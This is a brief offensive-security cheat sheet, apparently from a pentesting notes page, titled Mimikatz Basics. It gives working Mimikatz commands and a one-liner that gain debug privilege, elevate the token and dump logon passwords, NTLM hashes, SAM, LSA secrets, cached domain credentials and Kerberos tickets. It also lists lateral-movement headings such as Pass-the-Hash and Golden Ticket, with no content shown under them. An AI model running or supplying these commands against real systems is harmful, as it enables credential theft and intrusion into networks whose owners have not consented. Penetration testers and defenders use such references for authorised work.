🥝Mimikatz Basics
Basic Commands
mimikatz.exe
privilege::debug
token::elevateExtracting Credentials
Oneliner
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"Get NTLM Hashes from LSASS:
sekurlsa::logonpasswordsDump Kerberos Tickets
sekurlsa::tickets /exportDump Credential Manager
SAM Database
LSA Secrets
Cached Domain Credentials
Lateral Movement
Pass-the-Hash Attack
Pass The Ticket
Golden Ticket
Silver Ticket
Overpass-the-Hash
Last updated